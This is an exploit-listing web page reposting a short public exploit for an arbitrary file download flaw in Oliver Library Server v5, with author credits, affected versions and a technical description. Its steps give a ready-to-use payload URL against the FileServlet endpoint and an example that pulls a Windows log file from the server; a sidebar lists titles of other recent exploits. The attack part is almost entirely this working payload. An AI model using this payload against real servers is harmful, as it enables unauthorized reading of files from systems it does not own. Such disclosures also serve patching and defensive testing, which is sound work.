Oliver library server v5 arbitrary file download Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-12-15 | Type : remote | Platform : windows
This exploit / vulnerability Oliver library server v5 arbitrary file download is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016

Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.

Steps to Exploit:

1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>

2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log

Oliver library server v5 arbitrary file download


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Oliver library server v5 arbitrary file download Vulnerability / Exploit